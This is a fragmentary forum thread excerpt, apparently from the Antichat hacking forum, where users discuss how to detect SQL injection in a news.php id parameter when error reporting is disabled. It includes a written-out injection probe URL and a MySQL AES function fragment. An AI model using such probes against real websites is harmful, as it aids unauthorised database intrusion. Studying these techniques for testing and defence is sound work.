AES_DECRYPT(AES_ENCRYPT('строка','bla'),'bla')
Qwazar
Elder - Elder
If error reporting is turned off, in this case you can determine the presence of the vulnerability like this:
http://xxx/news.php?id=1'; --
...
Thus, for MYSQL the query remains the same and the same thing is displayed as for
http://xxx/news.php?id=1
Scipio
Members of Antichat
Qwazar said:
Qwazar
Elder - Elder
Although it is stated:
If error reporting is turned off, in this case you can determine the presence of the vulnerability like this